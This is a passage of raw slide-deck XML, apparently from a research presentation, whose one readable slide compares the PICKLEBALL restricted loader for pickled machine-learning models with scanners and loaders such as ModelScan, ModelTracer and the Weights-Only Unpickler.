            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294631"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="941" name="Google Shape;941;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859896" y="2317214"/>
            <a:ext cx="415605" cy="415605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="942" name="Google Shape;942;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800862" y="3533187"/>
            <a:ext cx="299700" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9075">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43550" lIns="43550" spcFirstLastPara="1" rIns="43550" wrap="square" tIns="43550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="666"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="943" name="Google Shape;943;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800868" y="3533181"/>
            <a:ext cx="299635" cy="288091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="944" name="Google Shape;944;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3692555" y="3448829"/>
            <a:ext cx="516250" cy="456764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="945" name="Google Shape;945;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904225"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="946" name="Google Shape;946;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904237"/>
            <a:ext cx="298800" cy="287400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43425" lIns="43425" spcFirstLastPara="1" rIns="43425" wrap="square" tIns="43425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="665"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="947" name="Google Shape;947;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904231"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="948" name="Google Shape;948;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859896" y="2926814"/>
            <a:ext cx="415605" cy="415605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949" name="Google Shape;949;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800862" y="4142787"/>
            <a:ext cx="299700" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9075">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43550" lIns="43550" spcFirstLastPara="1" rIns="43550" wrap="square" tIns="43550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="666"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="950" name="Google Shape;950;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800868" y="4142781"/>
            <a:ext cx="299635" cy="288091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="951" name="Google Shape;951;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3692555" y="4058429"/>
            <a:ext cx="516250" cy="456764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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55" name="Shape 955"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="956" name="Google Shape;956;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="957" name="Google Shape;957;p78"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="958" name="Google Shape;958;p78"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1618725"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1441700"/>
                <a:gridCol w="1157000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Tool</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ProtectAI ModelScan</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="550975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ModelTracer</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Weights-Only Unpickler</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>P</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ICKLE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ALL</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="959" name="Google Shape;959;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412900" y="2337050"/>
            <a:ext cx="4457400" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Static analysis tool integrated on Hugging Face.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="960" name="Google Shape;960;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412900" y="2931975"/>
            <a:ext cx="4457400" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Dynamic tracing tool proposed by Casey et al. [13].</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961" name="Google Shape;961;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394200" y="898725"/>
            <a:ext cx="4736100" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>is compared to  State of the Art solutions.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="962" name="Google Shape;962;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294625"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
